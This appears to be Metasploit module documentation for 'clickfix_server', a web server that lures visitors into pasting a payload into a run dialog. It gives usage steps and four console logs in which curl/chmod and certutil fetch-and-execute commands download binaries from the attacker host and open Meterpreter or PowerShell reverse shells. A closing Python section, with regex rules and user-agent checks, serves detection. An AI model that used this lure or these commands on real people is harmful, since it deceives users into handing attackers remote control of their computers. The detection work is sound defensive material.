Vulnerable Application
This module creates a web server which hosts a ClickFix-type exploit. When a user visits the site, they are given instructions on pasting our payload into a run dialog.
When using a custom HTML page, use INSERT_PAYLOAD_HERE as the placeholder where the generated payload is inserted.
Verification Steps
1. Start msfconsole
2. Do: `use exploit/multi/misc/clickfix_server`
3. Do: `set target #`
4. Do: `set payload [payload]`
5. Do: `run`
6. Visit the website and follow the instructions.
7. You should get a shell.
Options
SRVPORT
Web server port to use
TEMPLATE
Template type to use. Choices are auto and custom. The custom value requires the CUSTOM option to be set to an HTML file path. Defaults to auto, which uses a web browser update template.
CUSTOM
Path to HTML file to use
Scenarios
Linux Firefox 140.0
```
resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
msf > use exploit/multi/misc/clickfix_server
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/misc/clickfix_server) > set target 1
target => 1
msf exploit(multi/misc/clickfix_server) > set payload payload/cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/misc/clickfix_server) > set uripath clickfix
uripath => clickfix
msf exploit(multi/misc/clickfix_server) > exploit
[*] Command to run on remote host: curl -so ./CVMLVEkTDkF http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./CVMLVEkTDkF;./CVMLVEkTDkF&
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
msf exploit(multi/misc/clickfix_server) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1/clickfix
[*] Server started.
[*] 1.1.1.1 clickfix_server - Request /clickfix from Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
[*] Sending payload to 1.1.1.1 (curl/8.18.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.1:35658) at 2026-03-31 11:36:15 -0400

msf exploit(multi/misc/clickfix_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: h00die
meterpreter > sysinfo
Computer     : kali
OS           : Debian (Linux 6.18.12+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
```
Windows 10 Pro, Edge 146.0.0.0
```
resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
msf > use exploit/multi/misc/clickfix_server
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/misc/clickfix_server) > set payload payload/cmd/windows/http/x64/powershell_reverse_tcp
payload => cmd/windows/http/x64/powershell_reverse_tcp
msf exploit(multi/misc/clickfix_server) > set uripath clickfix
uripath => clickfix
msf exploit(multi/misc/clickfix_server) > exploit
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/1GCX5ZG1X0p1DW6ox6kAqA %TEMP%\VjyHKreJan.exe & start /B %TEMP%\VjyHKreJan.exe
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/clickfix_server) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /1GCX5ZG1X0p1DW6ox6kAqA
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1/clickfix
[*] Server started.
[*] 2.2.2.2 clickfix_server - Request /clickfix from Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Edg/146.0.0.0
[*] Client 2.2.2.2 requested /1GCX5ZG1X0p1DW6ox6kAqA
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /1GCX5ZG1X0p1DW6ox6kAqA
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Powershell session session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55701) at 2026-03-31 12:08:43 -0400

msf exploit(multi/misc/clickfix_server) > sessions -i 1
[*] Starting interaction with 1...

PS C:\Windows\system32> whoami
DESKTOP-1GAUR72\h00die
PS C:\Windows\system32> Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, OsHardwareAbstractionLayer

WindowsProductName WindowsVersion OsHardwareAbstractionLayer
------------------ -------------- --------------------------
Windows 10 Pro     2009           10.0.19041.6456
```
Windows 10 Pro, Chrome 146.0.0.0
```
resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
msf > use exploit/multi/misc/clickfix_server
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/misc/clickfix_server) > set uripath clickfix
uripath => clickfix
msf exploit(multi/misc/clickfix_server) > exploit
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/Jy5WA3Epc63uV93PB0rHzw %TEMP%\gXDMGfSOa.exe & start /B %TEMP%\gXDMGfSOa.exe
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/clickfix_server) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /Jy5WA3Epc63uV93PB0rHzw
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1/clickfix
[*] Server started.
[*] 2.2.2.2 clickfix_server - Request /clickfix from Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Sending stage (232006 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55757) at 2026-03-31 12:15:41 -0400

msf exploit(multi/misc/clickfix_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-1GAUR72\h00die
meterpreter > sysinfo
Computer        : DESKTOP-1GAUR72
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
```
Windows 10 Pro, Firefox
```
resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
msf > use exploit/multi/misc/clickfix_server
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/misc/clickfix_server) > set uripath clickfix
uripath => clickfix
msf exploit(multi/misc/clickfix_server) > exploit
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/Jy5WA3Epc63uV93PB0rHzw %TEMP%\lZCpTwOgv.exe & start /B %TEMP%\lZCpTwOgv.exe
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/clickfix_server) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /Jy5WA3Epc63uV93PB0rHzw
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1/clickfix
[*] Server started.
[*] 2.2.2.2 clickfix_server - Request /clickfix from Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Sending stage (232006 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55832) at 2026-03-31 12:18:33 -0400

msf exploit(multi/misc/clickfix_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-1GAUR72\h00die
meterpreter > sysinfo
Computer        : DESKTOP-1GAUR72
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```
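
The scenario output above leaves two artifacts a defender can key on: the fetch-and-execute command line, and, for certutil, a pair of requests for the same path with two distinct user agents. The following detection logic is an added example, not part of the module or its documentation; the rule names, regexes and sample records are constructed for illustration.

```python
import re

# Rules modeled on the "Command to run on remote host" lines in the scenarios
# above. The regexes and rule names are assumptions of this added example.
CMD_RULES = {
    # certutil as downloader: URL cache fetch into %TEMP%, same file then started
    "certutil_fetch_exec": re.compile(
        r"certutil(?:\.exe)?\s+.*-urlcache\s+.*-f\s+https?://\S+\s+"
        r"(?P<out>%temp%\\\S+\.exe)\s*&\s*start\s+(?:/b\s+)?(?P=out)", re.I),
    # curl writes a file, chmod +x marks it executable, same file then run
    "curl_chmod_exec": re.compile(
        r"curl\s+-\S*o\s+(?P<out>\S+)\s+https?://[^\s;]+\s*;\s*"
        r"chmod\s+\+x\s+(?P=out)\s*;\s*(?P=out)", re.I),
}
# In the scenarios, each certutil fetch appears as two requests, one per agent
CERTUTIL_UAS = ("Microsoft-CryptoAPI/", "CertUtil URL Agent")

def classify_command(cmdline):
    """Return the names of all rules a process command line matches."""
    return [name for name, rx in CMD_RULES.items() if rx.search(cmdline)]

def certutil_downloads(requests):
    """Return (client, path) pairs requested with both certutil user agents."""
    seen = {}
    for client, path, agent in requests:
        for idx, prefix in enumerate(CERTUTIL_UAS):
            if agent.startswith(prefix):
                seen.setdefault((client, path), set()).add(idx)
    return sorted(key for key, hits in seen.items() if len(hits) == len(CERTUTIL_UAS))

# Constructed samples: two command lines shaped like the scenario output,
# two benign ones, and proxy-style (client, path, user agent) records.
SAMPLE_COMMANDS = [
    r"certutil -urlcache -f http://192.0.2.10:8080/AbCdEf %TEMP%\update.exe & start /B %TEMP%\update.exe",
    "curl -so ./fixer http://192.0.2.10:8080/AbCdEf;chmod +x ./fixer;./fixer&",
    r"certutil -hashfile C:\Users\alice\setup.exe SHA256",
    "curl -s https://example.com/health",
]
SAMPLE_REQUESTS = [
    ("198.51.100.7", "/AbCdEf", "Microsoft-CryptoAPI/10.0"),
    ("198.51.100.7", "/AbCdEf", "CertUtil URL Agent"),
    ("198.51.100.8", "/crl/root.crl", "Microsoft-CryptoAPI/10.0"),
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(classify_command(cmd) or ["no match"], cmd)
    print(certutil_downloads(SAMPLE_REQUESTS))
```

Requiring both user agents for the same client and path keeps routine CryptoAPI traffic, such as the CRL fetch in the third sample record, out of the results.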